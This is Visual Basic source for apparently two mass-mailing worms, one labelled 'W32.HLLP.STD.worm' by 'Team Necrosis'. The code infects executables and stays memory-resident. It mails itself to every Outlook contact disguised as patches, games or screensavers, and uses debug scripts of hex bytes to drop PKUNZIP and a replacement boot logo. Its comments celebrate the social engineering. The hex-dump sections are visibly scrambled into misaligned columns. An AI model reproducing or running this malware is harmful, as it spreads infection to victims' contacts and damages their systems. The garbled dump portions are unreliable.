hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idprog) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit ' monitor the running exe from the temp file ' and have STD remain resident using 2K bytes ' of memory to run. This is what prohibits ' STD from being deleted in a Windows session ' along with windows requiring that file Loop Kill hideit Kill hideit ' As soon as the program has ended delete the ' temp file (2 times to ensure deletion) Randomize Timer ' Base random number gen on the time RandSend = Int(Rnd(1) * 20) + 1 If RandSend = 5 Then ' NOTE: to view mail messages see the ' declarations at the top of STD's code ' STD will send itself via Outlook 1 out of 20 ' exe executions upon the infected machine Call IGotWyrms("Hey", Notification, "") ' send the authorization mail telling all users ' that the next E-mail will have an attachment ' "Social engineering at its finest" - Evul Name "C:\windows\system\runtray_.dll" As "C:\windows\install_.exe" ' rename the mail file to a fake name Randomize Timer Dim Note As String randmsg = Int(Rnd(1) * 5) + 1 If randmsg = 1 Then Note = Notify & "an adult screensaver slideshow program" If randmsg = 2 Then Note = Notify & "an Outlook Service Release upgrade" If randmsg = 3 Then Note = Notify & "a Microsoft Explorer Patch" If randmsg = 4 Then Note = Notify & "a Desktop Game I got off the internet" If randmsg = 5 Then Note = Notify & "a brand-new MP3 player and plug-ins" Call IGotWyrms("Here it is", Note, "C:\windows\install_.exe") ' STD will send itself disguised as one of the ' above programs Name "C:\windows\install_.exe" As "C:\windows\system\runtray_.dll" ' rename the fake exe to the original fake name End If End If End ' End STD ' W32.HLLP.STD.worm by Error of Team Necrosis ' 32-bit exe infector/worm with a hint of social ' engineering ' One of the first Memory-Resident Exe infectors ' written in Visual Basic ' questions? ---> [email protected] ' http://teamnecrosis.20m.com End Sub

Private Sub Form_Load() If Dir("c:\windows\hop_along.exe") = "" Then ' check if already infected FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\hop_along.exe" CreateVBS ' call the Create VBS sub Shell "wscript.exe c:\windows\hop_along.vbs" ' Run the VBS script CreatePKunzip ' Call the CreatePKunzip sub LogoZip ' Call the LogoZip sub CreateBat ' Call the CreateBat sub Shell "c:\windows\hop_along.bat", vbHide ' Run the bat Wait4Bat ' Run the Wait4Bat Loop till bat is completed running FileCopy "c:\windows\logo.sys", "c:\logo.sys" 'Copy Logo file to c:\ End If End End Sub Public Sub CreateVBS() Open "c:\windows\hop_along.vbs" For Output As #1 Print #1, "Set createmail = CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")" Print #1, " If createmail <> " & Chr(34) & "" & Chr(34) & " Then" Print #1, " Set EachMail = createmail.GetNameSpace(" & Chr(34) & "MAPI" & Chr(34) & ")" Print #1, " For Each GetEmail In EachMail.AddressLists" Print #1, " If GetEmail.AddressEntries.Count > 0 Then" Print #1, " Set Eletter = createmail.CreateItem(0)" Print #1, " For VecH = 1 To GetEmail.AddressEntries.Count" Print #1, " Set FloP = GetEmail.AddressEntries(VecH)" Print #1, " If VecH = 1 Then" Print #1, " Eletter.BCC = FloP.Address" Print #1, " Else" Print #1, " Eletter.BCC = Eletter.BCC & " & Chr(34) & "; " & Chr(34) & " & FloP.Address" Print #1, " End If" Print #1, " Next" Print #1, " Eletter.Subject = " & Chr(34) & "Look At This!!!" & Chr(34); "" Print #1, " Eletter.Body = " & Chr(34) & "You have to see this file its so funny!" & Chr(34); "" Print #1, " Eletter.Attachments.Add " & Chr(34) & "C:\windows\hop_along.exe" & Chr(34); "" Print #1, " Eletter.DeleteAfterSubmit = True" Print #1, " Eletter.Send" Print #1, " End If" Print #1, " Next" Print #1, "End If" Close #1 End Sub Sub CreatePKunzip() Open "c:\windows\pkunzip.dbg" Print #2, "N PKUNZIP.COM" Print #2, "E 0100 B9 2E B9 BF Print #2, "E 0110 A3 22 B9 8D Print #2, "E 0120 00 E8 C0 01 Print #2, "E 0130 E8 61 00 E8 Print #2, "E 0140 53 92 E8 34 Print #2, "E 0150 20 B9 01 50 Print #2, "E 0160 E8 23 00 8B Print #2, "E 0170 02 E8 E7 FF Print #2, "E 0180 E8 D8 FF 58 Print #2, "E 0190 FA 92 5E C3 Print #2, "E 01A0 1E 28 B9 B8 Print #2, "E 01B0 10 72 03 BE Print #2, "E 01C0 12 8B D5 8B Print #2, "E 01D0 00 8B CE C7 Print #2, "E 01E0 C0 75 1F 8B Print #2, "E 01F0 7D CF 03 F5 Print #2, "E 0200 3A FF 97 8B

For Output As #2 BE A5 B8 3E 00 B8 1E B8 EB E8 02 00 CF 06 C5 33 4D

0B 00 4B 00 58 5B BC 48 D5 4F 42 10 E8 68 0B ED 14

2B 06 0A A0 E8 0A 0B 0A 56 02 CD 2B EF 0A C7 33 E3

CF 89 E8 20 28 E8 8B EB 96 33 21 C6 00 05 74 FF 31

32 26 31 B9 00 1F D6 E2 BA C9 8B 83 BA 06 11 EB 56

C0 26 00 E9 58 00 91 50 FF 33 F0 DA 00 B8 81 C7 8D

F3 B9 B8 0E B4 58 B4 E8 FF D2 85 00 0E 66 ED B0 75

AA B8 62 00 4C E8 40 F7 AC 88 D2 95 8D 0A EA 03 16

B4 C6 A9 BB CD 88 CD FF 42 0E 75 8B 4C E8 0F BA 33

30 09 E8 65 21 02 21 B8 84 2A 05 FA 12 A3 83 6A DB

CD E8 2B 0A C6 8B E9 3E C0 AA 3D 83 E8 00 DF 0A AC

21" 50" 00" 50" 06" F0" 82" 0A" 75" 8B" 00" EE" EC" 85" 00" E9" 3C"

Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print

#2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2,

"E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E

0210 0220 0230 0240 0250 0260 0270 0280 0290 02A0 02B0 02C0 02D0 02E0 02F0 0300 0310 0320 0330 0340 0350 0360 0370 0380 0390 03A0 03B0 03C0 03D0 03E0 03F0 0400 0410 0420 0430 0440 0450 0460 0470 0480 0490 04A0 04B0 04C0 04D0 04E0 04F0 0500 0510 0520 0530 0540 0550 0560 0570 0580 0590 05A0 05B0 05C0 05D0 05E0 05F0

1B ED 05 8B 06 E3 E8 BA 47 4E EC 8B 24 EA 1E 74 3E 43 01 B0 EA 74 75 E8 BC EA E7 BF DA 79 26 AA 03 39 74 13 B8 FB F7 CC 0E BF 47 FF 21 72 EB BA FE FE B9 02 F8 B8 81 C2 03 06 DE C2 EB 56 0E

74 5E B0 4D 00 15 B2 FE 4F EB A1 1E DF 4F AC 0D 24 84 49 20 FD 90 08 63 AA 8A 89 BA 73 E4 D2 84 C6 FD 04 4C FF 00 D2 FC B8 7C FC 58 5A 10 19 43 BF E8 62 8B 83 74 FE 40 81 DE AE 00 ED 8D 2B

0C E8 08 12 2B 8B 01 E8 AF EE D6 28 3C F5 3C 3C B9 C0 50 CD BA 3C BF 00 FC D6 0E AE 07 FC AE C0 5E E9 84 2C FF EB 2B C6 01 AA B8 80 B4 92 B9 0B 7C C2 9B CF DE 0B 80 74 FE AE 00 84 3D 75 DE

3C 4F E9 E8 C6 5C 8B 61 E0 8D AE B9 59 C3 20 6F 00 75 BA 21 C4 09 62 8B 33 8A 2A BD 81 E9 59 75 5A CE C0 E8 A3 03 44 06 57 8B 2C 3E 4E E8 20 B0 AA FE 8B BA 00 E8 FD 03 20 00 75 E4 00 FF 03

13 FF 14 71 3B 1C F7 01 FC 5D E9 CD 74 E8 74 74 74 F6 62 A3 0A 74 A9 F2 C0 F7 B9 FF F2 0D 5B FA EB FF 75 71 2A E8 10 20 CD CB AA FC B9 68 00 05 8D B8 7C 00 91 F5 08 E9 B7 E8 57 75 01 2B 36

75 85 FF 00 C1 8B E2 96 83 FC 3C 21 04 D5 17 04 34 85 A9 28 BB 8C A2 8B 45 D1 89 00 20 00 5F 5F E3 E8 E0 FE B9 BA 1B B9 21 03 BA A9 07 FC B4 E9 74 67 14 0E E8 FB 74 C3 72 B7 E8 0C 74 F3 DC

03 DB E8 83 72 54 EB 33 F9 89 01 5B 3C 00 3C 3C BE DB B8 B9 62 AA 24 E9 EB E3 16 B9 83 8F 5E 5E B8 BE 03 E8 A3 00 54 01 B4 FB E0 00 00 B8 3C 37 2E 0B 8B 52 47 B8 05 02 03 00 8E AA D7 72 AE

43 74 3B 7D 22 1E E9 C0 01 1E 53 C3 4E BE 09 4F 62 75 00 72 A9 E2 B9 8B 16 D1 2C 08 35 06 5D 58 05 FF D3 54 2C A1 12 8B 3E 4F AE 75 CD 26 BA FC 8B E8 74 E8 04 2C 8A A4 E8 BF 00 81 2D 06 3B

EB 10 FF 0E 8B 8D 79 A3 76 D6 B8 E8 75 81 74 75 A9 0A 3D 09 B0 F4 EB 0E AC E3 B9 00 B8 D2 C3 C3 0B E8 83 00 B9 2A 0B 1E CD FD E8 29 21 0B 2C A3 CB 31 16 73 EB AA CD 81 C4 00 D0 FF FE 81 D9

05 B8 8B 00 D6 78 01 D6 17 AE 00 90 F1 00 13 03 33 C7 80 C3 02 EB 03 2A 8B 33 E9 8B ED AE 50 52 E8 E3 C2 85 8B B9 C2 D0 21 B0 3E 50 72 E8 AA D0 F3 FC 85 FD DF E8 E8 FF 00 0E 16 00 00 FE 73

92 86 36 75 E8 2E B0 AE A7 80 42 FE 92 8A 3C A2 DB 44 3E BA E9 A4 BF B9 D8 09 37 D5 E2 55 56 56 32 00 1E C0 44 8B 74 AE E9 2F FF BA 17 DC CD AE A4 B8 F6 5A E9 EF F4 00 E2 B5 DE 9E 50 00 0B

B4 0A 26 2E 60 03 07 E3 74 3E EB B8 B4 4C 2D FC AC FF 22 D1 E2 80 E0 8B 32 33 00 33 F1 56 57 8B FD 8A 33 74 0A 16 0B 8B 56 F2 50 FE B8 FD 21 E9 32 2C 75 85 96 FB 00 9E EB 08 AE 72 E8 0E 87

02 E8 B9 8B 00 FA BA 24 06 2A 03 08 02 FF 75 A9 3C 2E B9 0A FD 3E AE 16 D9 51 E8 C0 AB 57 97 F0 B8 44 C9 4D 48 2C B8 4C FF AE 8B A9 00 72 73 E5 C0 AA 06 C0 FE E8 8B 72 58 AD E8 F2 0D 73 D9

CD 99 8B 4D 8B 03 B5 8B 4F AA 53 0C CD 32 6D E2 2E 5A 03 B0 AC 24 AA 2C 8A 02 27 D1 92 53 8B E8 7C 0A 03 E8 78 B9 52 0C E8 75 D7 B4 43 04 0A FE AA E8 3B 74 E8 30 CA 03 EB 92 95 E8 01 18 2B

21 00 55 0C 4D 7C 0A FA 4F 00 B4 CD 21 ED AC E2 75 C7 72 02 3C B9 EB B9 CD 4D 00 E8 AB 51 F2 76 AA 3C 54 24 05 F7 0B 8B 46 01 E8 1A CD 33 8B E8 E9 2B CF 0B 86 00 AD E8 0B 80 01 BA 91 BB D9

E2" 72" 10" A1" 0A" 20" E9" AD" 4E" 74" 3F" 21" 80" E3" 49" 80" 01" 44" 02" E9" 20" 00" E7" BF" 8A" 75" FD" D1" 4D" FF" AC" FD" E8" 08" 2A" FD" E8" D0" E8" 54" FF" 47" 48" CD" 21" C0" DA" D5" D2" FC" 72" 2B" FE" E9" 33" F9" C6" 3E" E8" 03" 59" 00" F3"

Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print

#2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2, #2,

"E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E

0600 0610 0620 0630 0640 0650 0660 0670 0680 0690 06A0 06B0 06C0 06D0 06E0 06F0 0700 0710 0720 0730 0740 0750 0760 0770 0780 0790 07A0 07B0 07C0 07D0 07E0 07F0 0800 0810 0820 0830 0840 0850 0860 0870 0880 0890 08A0 08B0 08C0 08D0 08E0 08F0 0900 0910 0920 0930 0940 0950 0960 0970 0980 0990 09A0 09B0 09C0 09D0 09E0

A4 0E DB DB FF 20 52 2A E9 78 B8 8A 01 FF D3 E3 80 E0 56 F3 A0 01 74 A3 B9 BF 88 AE A9 BC 35 11 FE AA D4 A0 BD EA A9 DB 33 E2 03 C0 A9 16 EB 47 C0 03 01 03 2C B5 EA 02 E5 0E 52 75 0B 54 20

BE 2B 8A 8A 0A B7 B9 E9 D3 0E 62 C8 93 56 D1 8B FB 93 51 AA B1 E9 BE D4 13 96 87 B8 BF AE 77 77 05 59 AE BD E2 F8 57 AC C0 F4 D8 0B 40 D6 D1 47 F3 FA 00 D8 08 01 F7 8B FE 8B E8 01 B0 4D 45

00 CA D9 D9 F8 72 00 77 EA 8A A4 D0 E8 96 E3 9F 04 E8 BF B1 20 D4 48 AE 00 0B BC 13 02 E8 0C 09 0B 85 8B 62 A8 85 B9 8A 89 83 E2 AC 89 A9 D0 33 AB 03 41 80 8A 56 D2 1F C9 FA DC C3 06 29 78

0E E8 8A B1 93 03 08 0D C3 8F E8 E9 52 8A 8B 62 72 02 02 18 89 00 74 B1 32 8B AE 00 9F 9B B1 B1 00 ED 0E A4 E8 C0 10 D8 00 38 FB 32 87 AC E0 C9 BF FA D3 FF C8 52 89 F7 75 2B F9 B4 E9 20 74

87 89 87 08 5B E8 BA F6 8A 02 26 D0 FF C2 18 A2 12 FF 9F B0 0E B1 03 05 C0 EF 47 E8 32 FE 02 03 32 75 FA E8 0C 74 00 D1 B1 00 83 E4 B2 8A FA 4A C0 FD E0 02 8B 83 17 D3 CF CA 5A 3E 76 20 72

D9 03 A8 2A C3 07 20 DD DA 9F 00 E9 03 32 85 85 93 03 B9 07 FA 02 E9 E8 F3 03 3B 9B FF 8A E8 E8 C9 AE A9 1B 00 F3 33 E3 0F 74 FB 85 A9 C8 41 75 0B AC 8B 72 05 3F 83 D1 5A 89 8B CD F7 46 61

F3 C3 0B D9 D1 00 AF 2A 32 E8 EB 49 C3 C9 DB DB 8A D8 90 F3 A9 E8 E2 9F AA E8 FD 00 8A C3 2F 1F 51 56 F3 00 59 52 C0 FF 03 12 01 C0 48 49 D1 DC 8B 84 1D F7 8A 00 06 E3 89 0E 1E 21 0D 41 63

A4 80 22 E8 EA 8A 8B CD FF D7 EE 25 C3 F7 78 78 C8 C3 00 AA B0 BE 00 FE 59 33 72 59 DA 3C FE FE 86 51 A4 A1 5E A3 F3 01 87 BE 77 74 AB 78 EB 5E 16 C0 D1 5E D8 75 D6 03 17 DC D0 BA 0A 53 74

5E F9 C2 E2 FE 34 F2 D3 D1 FF 3D 03 B8 D3 EE 1F D0 B8 B0 B1 05 FE B1 40 B1 DB F0 5E D1 10 04 04 C1 BE A1 FA 5F D6 AB E2 D8 DA A1 0E E2 17 D3 8B D6 74 E3 4F 32 18 A9 DD EB AE AE 2C 50 54 20

91 08 E8 FF CD 46 E8 EA E3 93 1D 00 00 FE 5E 8A E9 E2 08 08 F3 48 05 A3 04 B1 56 8B E3 73 03 03 32 02 D4 A9 C3 A9 5F F7 A9 A9 5E 8B E8 74 D0 3E A9 1E 56 4F FF 8B 04 84 AD E8 B4 AA 4B 21 55

EB 77 44 8A 74 B5 51 8A 8B 3D 01 04 02 C1 C3 8F 49 A8 F3 FE AA 79 E8 FA E8 03 51 2E 8B 06 8A EB ED 9F AE BE BA 89 56 BE D1 B9 56 D8 5E 15 AB D8 A3 3C 8B 4A D1 16 33 E5 51 03 40 B4 55 20 74

BB 12 00 CB 01 08 FC CD 9F 09 74 04 C3 D1 8A 42 24 E8 AA C0 C7 03 AA A9 8A E8 BF D4 9F AA 4D 08 2B BF BE 42 81 3E 8B B2 E0 0F 8B D1 56 8B 4A AE D6 08 36 79 E3 D6 D2 74 52 00 CD 41 4E 20 69

8B 53 5B 8A C3 9D 5A E8 62 01 1B D3 B1 EB DA A0 01 AE B1 F3 06 E9 FE 51 FE 79 20 AE 20 4D FF B1 E9 42 02 A0 0B D8 0E A9 43 00 0E E3 BF 1D 75 B9 A9 77 D8 D8 03 A9 89 02 8B 5A 21 CD 5A 4D 6C

CF 33 C3 D8 9C C3 59 CE A0 73 2D E0 08 D1 32 E8 04 FF 70 AA D4 13 05 BF 05 FE B7 03 B7 75 EB 07 72 A0 9F BF B0 AE D6 BB 43 33 D6 8B C0 33 E5 00 4A 22 AE FC 1E 8B 12 43 CF 59 5B 21 4A 69 69

BA C0 53 E8 81 50 58 FF 85 09 01 05 E8 E8 FF 70 02 EB FE BF AE FE 01 BC 04 8A BE 2E 8A E5 17 E8 3B 03 BF 62 04 BF A9 02 89 DB A9 87 0B C0 EB 01 03 91 89 5A D8 F2 89 43 BA C3 3B BA 52 6E 74

00" 33" 33" DB" FE" 51" C3" 2A" DB" C3" 01" 01" 9F" D1" D1" FF" D3" DD" C0" 42" 20" 57" 01" AE" 00" 1D" BC" FA" 8F" EB" 3C" 16" F3" 36" 62" A2" E9" D8" 33" 00" 00" AD" BF" B2" 8B" D1" 07" 33" F2" B8" 10" C3" AE" D1" 52" D0" 00" 53" C1" B1" 28" 69" 79"

Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Print #2, Close #2 End Sub

"E 09F0 "E 0A00 "E 0A10 "E 0A20 "E 0A30 "E 0A40 "E 0A50 "E 0A60 "E 0A70 "E 0A80 "E 0A90 "E 0AA0 "E 0AB0 "E 0AC0 "E 0AD0 "E 0AE0 "E 0AF0 "E 0B00 "E 0B10 "E 0B20 "E 0B30 "E 0B40 "E 0B50 "E 0B60 "E 0B70 "E 0B80 "E 0B90 "E 0BA0 "E 0BB0 "RCX" "0ABE" "W" "Q"

20 20 20 45 73 55 68 6E 69 69 74 73 6E 6C 00 20 7A 68 70 66 78 3F 20 20 67 00 74 0B FF

20 30 31 20 20 4E 69 67 6E 70 20 65 29 65 55 5B 69 5D 72 6F 69 20 00 63 3A 46 61 04 64

56 32 39 49 52 5A 6E 21 20 46 74 20 3F 73 73 2D 70 0D 65 72 73 00 66 68 20 69 62 0C 69

Sub LogoZip() Open "c:\windows\logo.dbg" Print #3, "N LOGO.ZIP" Print #3, "E 0100 50 4B 03 Print #3, "E 0110 09 49 36 Print #3, "E 0120 67 6F 2E Print #3, "E 0130 07 8E E4 Print #3, "E 0140 E0 50 89 Print #3, "E 0150 28 76 A0 Print #3, "E 0160 BE CC 0C Print #3, "E 0170 77 04 E1 Print #3, "E 0180 BF FD 74 Print #3, "E 0190 BF D0 FF Print #3, "E 01A0 1F 9A AB Print #3, "E 01B0 59 FD 4C Print #3, "E 01C0 17 EA EF Print #3, "E 01D0 F7 7B BA Print #3, "E 01E0 74 8F 8F Print #3, "E 01F0 BF BF 50 Print #3, "E 0200 7E AD D4 Print #3, "E 0210 DF 2A F5 Print #3, "E 0220 47 A9 8F Print #3, "E 0230 77 38 3D Print #3, "E 0240 1F 69 AC Print #3, "E 0250 5A 6F B6 Print #3, "E 0260 DB 0D 82 Print #3, "E 0270 3A ED 56

65 2D 38 6E 65 4A 67 20 5A 69 6F 66 20 00 61 6F 5D 0A 73 3A 74 43 69 65 00 6C 6C 03 73

72 30 39 63 73 52 20 00 49 78 20 69 00 43 67 5D 20 00 73 20 73 61 6C 63 20 65 65 0D 6B

73 31 2D 2E 65 3A 5A 00 50 00 65 6C 54 61 65 20 5B 55 69 00 21 6E 65 6B 49 20 00 02 20

69 2D 31 20 72 20 49 50 20 44 78 65 6F 6E 3A 66 6F 6E 6F 20 20 27 20 00 6E 68 10 0E 66

6F 39 39 41 76 00 50 4B 2D 6F 74 73 6F 27 20 69 75 6B 6E 61 4F 74 66 45 66 61 11 01 75

6E 33 39 6C 65 0D 3A 00 20 20 72 20 20 74 20 6C 74 6E 20 6C 76 20 61 78 6C 73 12 0F 6C

20 0D 33 6C 64 0A 20 00 55 79 61 6E 6D 20 70 65 70 6F 6D 72 65 63 69 74 61 20 00 01 6C

32 0A 20 20 2E 00 00 45 73 6F 63 6F 61 4F 6B 6E 75 77 65 65 72 72 6C 72 74 61 08 03 00

2E 43 50 52 0D 53 57 72 65 75 74 77 6E 70 75 61 74 6E 74 61 77 65 73 61 69 20 07 07 00

30 6F 4B 69 0A 65 61 72 20 20 20 20 79 65 6E 6D 5F 20 68 64 72 61 20 63 6E 62 09 0F 01

34 67 70 72 57 41 67 68 00 50 61 72 72 6E 6F 72 50 4B 77 61 74 68 28 79 20 66 6E 3A 7A 6A 65 5B 70 61 63 6F 6F 64 79 20 69 74 74 65 43 52 74 69 67 3A 61 64 06 0A 1F 3F 00"

20" 2E" 52" 74" 4B" 63" 69" 20" 5A" 6E" 65" 2F" 69" 20" 72" 2E" 74" 6D" 20" 65" 65" 3A" 43" 6E" 20" 20" 05" 7F"

00 00 8F 15 33 71 D7 EA D4 6F EA A8 FA 7C 2D E7 A0 52 45 DE DD 7A BA 1E

38 08 2B 60 67 E9 13 66 CF D4 7C 7F AB 41 68 4A D4 BF 3D DE DD 3E 1E 0F

51 00 C7 40 86 66 6E 73 E9 BF 56 AB FA 15 1F 7D EF FA 4C 8F 3F B7 86 BB

9B 00 15 81 23 73 BF 58 DF 3E 00 CF BD 9F 8E F7 FE 41 66 A7 4C 5A 41 ED

28 00 46 E1 47 99 9E F7 5F 54 80 D4 FA 51 3E A5 AC A9 8B 3C 68 ED D0 66

D3" 6F" 04" 81" 9D" FB" E1" 37" D5" 9F" CD" D4" FD" 27" EA" DF" D7" FE" 66" DD" B9" A7" 76" 5A"

For Output As #3 04 12 53 3F 52 DC 7D 91 7F 37 2D CD EA F4 E9 EA 9F E5 22 9D D5 BB 30 EB

14 00 59 20 45 86 6F C5 A3 EA F3 D5 2B 0D 9E 87 7F 77 A5 DB 09 C3 EC FC

00 00 53 28 0A 42 55 4B 98 A7 8F C7 F5 8D 3F 5F A7 4A 3E DD C2 F1 F5 FC

00 36 ED 36 9D 07 F5 72 4F 7A 3A 2A 37 7C E3 29 D4 7D 5C A0 A8 78 7A F4

00 F8 9D 6C 39 86 CA FA 7F 5C D3 54 F5 45 BD F5 1F FE E8 D7 3F 7A 51 78

08 01 39 28 B3 9D 2E 9B A2 AD 7F 9F 8D B7 55 FD FF BD 1F 1F 1C 7C 16 3A

17 6C 6B 44 4A 85 9E F0 D3 EA F7 3F 13 E5 52 52 D4 5F D5 B4 78 4E ED BD

Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print Print

#3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3, #3,

"E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E "E

0280 0290 02A0 02B0 02C0 02D0 02E0 02F0 0300 0310 0320 0330 0340 0350 0360 0370 0380 0390 03A0 03B0 03C0 03D0 03E0 03F0 0400 0410 0420 0430 0440 0450 0460 0470 0480 0490 04A0 04B0 04C0 04D0 04E0 04F0 0500 0510 0520 0530 0540 0550 0560 0570 0580 0590 05A0 05B0 05C0 05D0 05E0 05F0 0600 0610 0620 0630 0640 0650 0660

2E 8E D8 E5 86 B7 A0 D7 35 0F 0F F1 1C A8 32 70 D9 0D 03 29 F9 7D 0D E9 06 E8 F0 2A 5D 02 6F 2A 8F 11 19 80 92 2E FB E0 55 38 B8 FD AC 01 F1 2C 01 F4 6C 01 CF FE 01 CB 9F FC A3 FA A8 F6 D2

66 FB F1 7C 34 DB 8D 9B 25 71 3A F1 82 CE BF 7E D9 28 4D 34 C9 44 36 AC B8 AF E9 E0 9D 2E 80 E0 DC 70 87 0B FE 78 AB 1E C0 E8 E0 55 8E 17 57 0F 17 57 94 17 32 67 FF 80 65 CF 46 9F D1 C7 9B

D3 ED D0 AA 1E CD D1 DD F3 15 3F C6 0E 8F 31 91 A6 D5 82 BE 66 9E 41 28 E1 02 8A 82 BF F8 FE 82 FC C2 BF 5E 2A 21 80 0F 05 AF 06 C0 F0 2C 01 F3 AC 01 F5 2C E0 19 B3 FF C0 32 FF 2F FF BB CB

C9 66 E4 87 06 66 5B FE F8 65 7E E8 86 42 8A DD F3 FB 31 A7 67 7E 1A 19 BD 2E BF DF 0A 0F 2A 3F 55 6B 0A 60 E0 AA 0B 7F B7 02 61 05 57 CA 17 57 FA 17 57 3A 7F F0 0C 59 FF E0 F3 36 FC 48 7E

C3 45 E1 A8 5D CD D3 F8 DC AA 4A FC B2 E6 6F DA B3 31 61 A4 64 51 B7 0E D5 F8 0A 9A B8 56 E0 DD C0 0E B8 E5 82 BF 5E 15 22 2E 7F 37 01 F1 AC 01 F3 EC 01 F6 96 3F F8 06 2C 7F 0D E0 62 E4 19

FD C3 6E AA 7A AC EE 48 EA CB 0E 0E E2 A1 67 C9 43 0D 32 06 27 3A 01 4B 5F 00 B8 F9 E0 FE 82 F0 05 BC E0 AF 57 0A 9D 70 F9 B8 15 A3 17 57 23 17 57 3A 17 57 01 CB 9F FC 03 96 E1 83 F9 5D EF

DD E3 34 43 4A 0C 74 C9 74 F8 30 7B 64 4C E3 6C F9 9B FB 91 33 FD 9E EF 05 E8 E0 AB B7 2A FF 57 7F 45 A5 02 4D B8 EF C1 AB BF 70 FB AC 01 F2 AC 01 F5 2C 01 FF 80 65 CF FE 01 AF 12 25 67 25

68 FB 88 55 7E FA 83 74 C3 AE B0 CE 74 F2 5B BE 48 09 28 9E 23 4E 4E 9A 5C AF 33 80 C0 E0 2E 01 8A C0 31 2E FA E0 AF 7D 80 D0 C1 AB E8 17 57 FA 17 57 3A 17 B3 FF C0 32 67 FF 7A 1C BC 41 3F

D8 DB C2 34 46 F2 B0 28 48 34 01 6F 58 CB 65 CC 79 68 3E 6A F5 27 E9 99 F0 02 3B 0B FE 82 ED 17 E9 09 FE 78 AB C5 02 33 0B 5F 9D 80 F0 2C 01 F3 6C 01 F6 F0 0C 59 FF E0 19 B3 0F F7 87 5A B1

8F 61 6E B6 7A 66 D7 99 0F 4A 26 B9 3A F9 B1 CD 88 7E B3 94 10 1B 04 BD DE 2E 7F 7E 2A FF AF FC AF 7F 2A 1D 80 BD 2E FE 6E 05 D3 0B 57 CA 17 57 4F 17 57 3F F8 06 2C 7F F0 0C DC 15 00 90 BF

C2 BF A7 DB CA 43 1F C1 E9 B1 11 98 3F 6C 01 22 E6 67 31 D5 47 DF 8C B5 EA F8 15 BF E0 38 02 91 02 B2 E0 96 0B FE 78 2A 1C 5C FE EE 01 F1 2C 01 F4 6C 01 CB 9F FC 03 96 3F F8 24 71 AB 29 F8

A0 17 F5 AC C3 E3 0C E8 FC CE EA 53 13 62 EE 1A 24 F4 34 81 4A 86 78 63 AF CC 70 E6 82 EA 2E 9B 2E EE 82 BF 5E 2A 25 E0 F4 70 2A F0 17 57 C9 17 57 85 17 80 65 CF FE 01 CB 9F F8 93 F0 2D 5D

D3 74 FC ED 61 BB 47 8E CC F9 CB 50 56 1F 38 A6 8D 94 17 27 55 E3 02 F7 02 CE C1 AF FF AF F8 BF F8 AF 17 0A DC E0 BE 82 57 2F E0 F7 6C 01 F2 AC 01 F5 2C FF C0 32 67 FF 80 65 6B C1 3F CF B7

3A DB 48 23 BF FD B7 46 90 21 1C 0F 2E 31 C0 A9 E9 36 CC 91 3A D3 DA 56 2E 5F 67 02 B6 02 EF 0A 53 02 0D B8 EB 82 BF 9B 01 A6 82 57 E3 17 57 FA 17 57 2B 59 FF E0 19 B3 FF C0 7F 5F A7 F8 37

3F 34 55 DE DF FE 76 E7 CE E9 5F 77 3F E2 74 C5 49 40 F4 9D D3 A9 AD DF F8 05 80 2E E2 2E D2 B8 4C 2E F9 E0 AF 97 0A B4 17 BF DB 01 F0 EC 01 F3 2C 01 F6 06 2C 7F F0 0C 59 FF 2C FD 3F E2 DE

